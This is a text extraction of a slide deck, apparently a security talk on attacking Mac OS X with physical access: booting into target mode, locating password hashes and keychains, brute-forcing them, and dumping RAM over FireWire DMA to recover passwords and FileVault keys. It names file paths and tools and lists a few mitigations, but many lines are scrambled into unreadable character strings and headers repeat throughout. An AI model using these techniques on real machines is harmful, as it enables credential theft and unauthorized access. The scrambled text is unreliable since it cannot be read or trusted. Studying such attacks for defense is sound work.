Hck Mac OS X Tips and tricks for Mac OS X hack Summary Introduction Exploitation of target mode Exploitation of physical memory Exploitation of user privileges Conclusion Introduction Introduction Exploitation of target mode Exploitation of physical memory Market Share Exploitation of user privileges Conclusion Mac vs Windows Introduction Exploitation of target mode Exploitation of physical memory Market Share Exploitation of user privileges Conclusion by continent Introduction Exploitation of target mode Exploitation of physical memory Mac OS X history Exploitation of user privileges Conclusion 1996 : Purchase of NeXT and NeXTSTEP OS by Apple 1996 : Come back of Steve Jobs within Apple (left in 1985) 1999 : First version of Mac OS X server (1.0) 2001 : First version of Mac OS X Workstation (10.0 Cheetah) 2006 : First Mac(Book) without PowerPC processor and with Intel processor Introduction Exploitation of target mode Exploitation of physical memory Mac OS X architecture Exploitation of user privileges Conclusion UNIX system Based on Darwin OS (hybrid kernel XNU) Kernel XNU is based on micro-kernel of NeXTSTEP (Mach) and kernel of BSD (FreeBSD) But Darwin doesn’t contain graphical motor “Quartz” Introduction Exploitation of target mode Exploitation of physical memory Mac OS X architecture Exploitation of user privileges Conclusion Mach Applications services Mac interfaces IO Toolkit Login Windows EFI BSD Quartz/Aqua Platform Expert Launchd Finder/Dock Core services Applications Hardware Darwin (Mach) OS X Kernel space User space Exploitation of target mode Introduction Exploitation of target mode Exploitation of physical memory About target mode Exploitation of user privileges Conclusion During the starting > press “T” Access not protected by default I@@5779GGHCH<9R@9GGMGH9A8=G?H<FCI;<R@9GA5B5;9F Introduction Exploitation of target mode Exploitation of physical memory Alternatives Exploitation of user privileges Conclusion Single mode (press “Apple + S”) From live OS in USB/CD device > Press “Alt” From Mac OS X installation DVD > Press “C” and select Reset Password from installer Introduction Exploitation of target mode Exploitation of physical memory Identify system users Exploitation of user privileges Conclusion User UID in /private/var/db/dslocal/indices/Default/index User privileges in /var/db/dslocal/nodes/Default/groupe/admin.plist Introduction Exploitation of target mode Exploitation of physical memory Identify system passwords Exploitation of user privileges Conclusion Hashes passwords in /var/db/shadow/hash Find clear password with brute force attack (JTR) Introduction Exploitation of target mode Exploitation of physical memory 6CIH$9M7<5=BR@9 Exploitation of user privileges Conclusion $9M7<5=BR@9GHCF9GG97F9HG85H5@=?9Safari passwords, WIFI keys, Skype username/password, Google username/password (contact, Picasa), Exchange username/password, ... Introduction Exploitation of target mode Exploitation of physical memory (D9B$9M7<5=BR@9G Exploitation of user privileges Conclusion For each user, Keychain is stored in /Users/<USER>/Library/ Keychains/login.keychain $9M7<5=BR@9G5F9DFCH97H986M?9M7<5=BD5GGKCF8 "HQGDCGG=6@9HC=ADCFH5BM$9M7<5=BR@9GK=H<CIH?BCK the Keychain password Introduction Exploitation of target mode Exploitation of physical memory (D9B$9M7<5=BR@9G Exploitation of user privileges Conclusion But, you have to know “keychain” password to exploit it :( By default, “keychain” password is equal to user system password :-) Introduction Exploitation of target mode Exploitation of physical memory (D9B$9M7<5=BR@9G Exploitation of user privileges Conclusion You can identity password in volatility data You can attempt identify password by brute force attack Introduction Exploitation of target mode Exploitation of physical memory About Filevault encryption Exploitation of user privileges Conclusion B7FMDH=CBC:R@9GMGH9A, @=?9=H%C7?9FCF DM-Crypt I@@9B7FMDH=CB:FCA%=CBJ9FG=CB Only Home directory encryption for previous versions Native function from Mac OS X 10.3 “.dmg” images can use Filevault encryption Introduction Exploitation of target mode Exploitation of physical memory About Filevault encryption Exploitation of user privileges Conclusion Home directory without encryption Home directory with Filevault encryption Introduction Exploitation of target mode Exploitation of physical memory (D9B=@9J5I@HR@9 Exploitation of user privileges Conclusion =@9J5I@HR@9=GGHCF98=B/Users/<USER>/test.sparsebundle =@9J5I@HR@9G5F9DFCH97H986MD5GGKCF8 ... and it’s the same as <user> system password :-) ,C:FCAH5F;9HAC89=HQG95GMHC897FMDHH<=GR@9 Introduction Exploitation of target mode Exploitation of physical memory (D9B=@9J5I@HR@9 Exploitation of user privileges Conclusion You can identity AES key in volatility data ... Else, without access to hashes password, it is possible to 5HH9ADHHCRB8D5GGKCF86M6FIH9:CF795HH57? Exploitation of physical memory Introduction Exploitation of target mode Exploitation of physical memory Physical memory dump Exploitation of user privileges Conclusion From root access, MacMemoryReader can dump RAM MMR create temporary kernel extension to read /dev/ mem devices Introduction Exploitation of target mode Exploitation of physical memory Physical memory dump Exploitation of user privileges Conclusion 4'!!+%(#!56'! contained physical memory dump for safe mode (hibernation mode) FCA:I@@5779GG8=G?O,@99D=A5;9PR@975B69J=9K98 FCAF979BHJ9FG=CBGR@9=G9B7FMDH98 Configuration of encryption of “sleepimpage” (root privileges to modification) Introduction Exploitation of target mode Exploitation of physical memory Physical memory dump Exploitation of user privileges Conclusion Physical extraction ... + Tools to extract RAM > http://www.mcgrewsecurity.com Introduction Exploitation of target mode Exploitation of physical memory Physical memory dump Exploitation of user privileges Conclusion From DMA access, RAM dump is possible and EASY “pythonraw1394” libraries allow to dump RAM of 0=B8CKGGMGH9A:FCA%=BIL(2006 - Adam Boileau - Winlockpwn) “libforensic1394” (Freddie Witherden) libraries allow to dump +&C:&(,1:FCA(,1CF%=BIL Introduction Exploitation of target mode Exploitation of physical memory DMA access - PoC Exploitation of user privileges Conclusion Using of “libforensic1394” libraries is very easy :-) and allow to write code to dump RAM ... Introduction Exploitation of target mode Exploitation of physical memory Exploit DMA access Exploitation of user privileges Conclusion DEMO $..+ -/ ()'*#-+*.", 0% !*!2+'*%.6,!1%,!!--#%)-.$.(' Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion Identify current username for a locked session (open without auto logon) Identify password for a locked session (open without auto logon) Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion Identify current username for a locked session (open with auto logon) Identify current password for a locked session (open with auto logon) Identify just username for a locked session after startup Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion A lot of others data secret are into physical memory like : Email / Calendar data (:R798C7IA9BHG85H5 Web passwords Software passwords Keychain password ... Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion AES 128 key used for Filevault encryption can be found into physical memory and allows to : 97FMDH9B7FMDH98<CA98=F97HCF=9G5B8:I@@9B7FMDH988=G?G%=CBJ9FG=CB Identify secret data in hard disk (like system passwords) Unlock system ,$9MRB8HCC@75B9LHF57H,?9MG Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion Passware Kit 11.3 can extract and exploit the found keys Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion P0C to identify Web and software passwords Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion P0C to identify Web and software passwords Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion P0C to identify Mac OSX passwords Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion P0C to identify Mac OSX passwords Introduction Exploitation of target mode Exploitation of physical memory Identify secret data Exploitation of user privileges Conclusion Is it possible to extract secret data when full encryption is 57H=J5H98%=CBJ9FG=CB6M&5779GG YES ! but NO if : System is not started (pre-boot authentication screen) System is hibernated in forcing to remove power from RAM (hibernatemode=25) 'H<9D5F5A9H9FHCF9ACJ9R@9J5I@H?9MG=B+&=G57H=J5H98 (destroyfvkeyonstandby=1) Introduction Exploitation of target mode Exploitation of physical memory Writing physical memory Exploitation of user privileges Conclusion ... to bypass session password with “libforensic1394” libraries ! but ... it doesn’t work :-( Introduction Exploitation of target mode Exploitation of physical memory Writing physical memory Exploitation of user privileges Conclusion Inception tool (breaknenter.org) will